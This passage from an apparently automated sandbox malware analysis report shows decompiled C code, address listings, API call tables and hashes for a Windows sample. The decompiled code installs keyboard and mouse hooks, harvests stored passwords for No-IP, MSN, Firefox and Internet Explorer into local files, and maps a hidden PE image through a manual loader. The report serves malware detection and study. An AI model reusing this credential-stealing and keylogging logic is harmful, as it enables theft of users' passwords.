										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
										_t160 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
										while(1) {
											_t163 = E0040BA84(__eflags);
											__eflags = _t163;
											if(_t163 != 0) {
												break;
											}
											E00405918();
										}
										ExitProcess(0);
										goto L27;
									}
									CloseHandle(_t267);
									E00409AD4( &_v24, _t267, _t323, __eflags);
									E00401B14(0x40f1ec, _v24);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v28);
										E00401D58( &_v28, "NOIP.abc");
										_pop(_t283);
										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
									}
									E00409D28( &_v32, _t267, _t320, _t323);
									_t297 = _v32;
									E00401B14(0x40f1ec, _v32);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v36);
										E00401D58( &_v36, "MSN.abc");
										_t297 =  *0x40f1ec;
										_pop(_t282);
										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
									}
									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
									E00401B14(0x40f1ec, _v40);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v44);
										E00401D58( &_v44, "FIREFOX.abc");
										_pop(_t281);
										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
									}
									E00409A84( &_v48);
									E00401B14(0x40f1ec, _v48);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v52);
										E00401D58( &_v52, "IELOGIN.abc");
										_pop(_t280);
										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
									}
									E00409A90( &_v56);
									E00401B14(0x40f1ec, _v56);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v60);
										E00401D58( &_v60, "IEPASS.abc");
										_pop(_t279);
										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
									}
									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
									E00401B14(0x40f1ec, _v64);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v68);
										E00401D58( &_v68, "IEAUTO.abc");
										_pop(_t278);
										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
									}
									E00409AB8( &_v72, _t320, _t323, __eflags);
									E00401B14(0x40f1ec, _v72);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v76);
										E00401D58( &_v76, "IEWEB.abc");
										_pop(_t277);
										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
									}
									goto L44;
								}
								_t325 = _t71 >> 1;
								goto L67;
							}
							_t261 =  *_t322;
							_t322 = _t322 - 0xfffffffc;
							asm("adc ebx, ebx");
							if(_t322 < 0) {
								goto L62;
							}
							L56:
							_t65 = _t65 - 1;
							_t259 = _t261 + _t261;
							if(_t259 == 0) {
								_t259 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
						}
						L47:
						_t259 = _t259 + _t259;
						__eflags = _t259;
					} while (_t259 != 0);
				}
			}
























































































                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403EC0, Relevance: 7.7, APIs: 5, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t116;
				void* _t121;
				void* _t135;
				intOrPtr _t138;
				void* _t150;
				void* _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t197;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t209;
				signed int _t210;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;

				_t208 = __edi;
				_t215 = _t216;
				_t217 = _t216 + 0xffffffc8;
				_push(__edi);
				_v44 = __ecx;
				_t183 = __edx;
				_v40 = __eax;
				_t197 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v36, _t197);
				_push(_t216);
				_push(0x4040ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_push(0);
				_push(_v44);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
				_v16 = _t116;
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
				_v48 = _t121;
				E00401258(_v44,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t135 >= 0) {
					_v60 = _t135 + 1;
					_t185 = 0;
					do {
						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
						if(_t208 < _v52) {
							_t210 = _t208 ^ _v52;
							_v52 = _v52 ^ _t210;
							_t208 = _t210 ^ _v52;
						}
						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
						_v48 = _t175;
						E00401414(_v48, _t208);
						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
						_t185 = _t185 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _t138;
				_v24 = _t138;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				E00402FBC();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E00403D08(_t145 + _v16, _t215);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t184 = 0;
					do {
						_t209 = _t184 + _t184 * 4;
						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
						_t184 = _t184 + 1;
						_t101 =  &_v60;
						 *_t101 = _v60 - 1;
					} while ( *_t101 != 0);
				}
				_t189 =  *0x4037bc; // 0x4037c0
				E00402704(_a4, _t189,  &_v36);
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E004040C1);
				_t205 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v36, _t205);
			}


































                                    0x00403ec0
                                    0x00403ec1
                                    0x00403ec3
                                    0x00403ec8
                                    0x00403ec9
                                    0x00403ecc
                                    0x00403ece
                                    0x00403ed4
                                    0x00403eda
                                    0x00403ee1
                                    0x00403ee2
                                    0x00403ee7
                                    0x00403eea
                                    0x00403ef2
                                    0x00403ef3
                                    0x00403efa
                                    0x00403efe
                                    0x00403f05
                                    0x00403f17
                                    0x00403f1c
                                    0x00403f28
                                    0x00403f3d
                                    0x00403f42
                                    0x00403f51
                                    0x00403f67
                                    0x00403f79
                                    0x00403f82
                                    0x00403f85
                                    0x00403f88
                                    0x00403f8b
                                    0x00403f8d
                                    0x00403f90
                                    0x00403f9b
                                    0x00403fa1
                                    0x00403fa3
                                    0x00403fa6
                                    0x00403fa9
                                    0x00403fa9
                                    0x00403fbf
                                    0x00403fc4
                                    0x00403fce
                                    0x00403fe3
                                    0x00403fe8
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403f8d
                                    0x00403ff4
                                    0x00403ff7
                                    0x00403ffa
                                    0x00404000
                                    0x00404009
                                    0x0040400c
                                    0x0040401c
                                    0x00404027
                                    0x0040402f
                                    0x00404035
                                    0x0040403a
                                    0x0040403e
                                    0x00404046
                                    0x0040404c
                                    0x00404051
                                    0x00404059
                                    0x0040405c
                                    0x0040405f
                                    0x00404062
                                    0x00404064
                                    0x00404068
                                    0x00404082
                                    0x00404087
                                    0x00404088
                                    0x00404088
                                    0x00404088
                                    0x00404064
                                    0x00404093
                                    0x00404099
                                    0x004040a0
                                    0x004040a3
                                    0x004040a6
                                    0x004040ae
                                    0x004040b9

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406088, Relevance: 6.1, APIs: 4, Instructions: 83registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _t35;
				long _t46;
				intOrPtr _t66;
				void* _t72;
				char* _t73;
				void* _t76;

				_v12 = __ecx;
				_v8 = __edx;
				_t72 = __eax;
				_t60 = _a4;
				E00401F38(_v8);
				E00401F38(_v12);
				E00401F38(_a8);
				_push(_t76);
				_push(0x406167);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76 + 0xffffffec;
				E00401B14(_a4, _a8);
				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
				if(_t35 == 0) {
					_t73 = E00401F48(_v12);
					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 == 0) {
						E00402074(_t60, _v24);
						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
						E00402074(_t60, _v24 - 1);
					}
					RegCloseKey(_v16); // executed
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0040616E);
				E00401AE4( &_v12, 2);
				return E00401AC0( &_a8);
			}














                                    0x00406090
                                    0x00406093
                                    0x00406096
                                    0x00406098
                                    0x0040609e
                                    0x004060a6
                                    0x004060ae
                                    0x004060b5
                                    0x004060b6
                                    0x004060bb
                                    0x004060be
                                    0x004060c6
                                    0x004060dd
                                    0x004060e4
                                    0x004060fa
                                    0x00406101
                                    0x00406108
                                    0x0040610f
                                    0x0040612b
                                    0x00406136
                                    0x00406136
                                    0x0040613f
                                    0x0040613f
                                    0x00406146
                                    0x00406149
                                    0x0040614c
                                    0x00406159
                                    0x00406166

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D70, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t17;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				E00401F38(_v12);
				_push(_t39);
				_push(0x405e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
				_t28 = _t17;
				if(_t28 != 0xffffffff) {
					if(_t36 == 0xffffffff) {
						SetFilePointer(_t28, 0, 0, 0);
					}
					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
					CloseHandle(_t28); // executed
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00405E11);
				return E00401AE4( &_v12, 2);
			}











                                    0x00405d78
                                    0x00405d7a
                                    0x00405d7d
                                    0x00405d83
                                    0x00405d8b
                                    0x00405d92
                                    0x00405d93
                                    0x00405d98
                                    0x00405d9b
                                    0x00405db6
                                    0x00405dbb
                                    0x00405dc0
                                    0x00405dc5
                                    0x00405dce
                                    0x00405dce
                                    0x00405de4
                                    0x00405dea
                                    0x00405dea
                                    0x00405df1
                                    0x00405df4
                                    0x00405df7
                                    0x00405e09

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405850() {
				void* _t1;
				void* _t4;

				_t4 = 0;
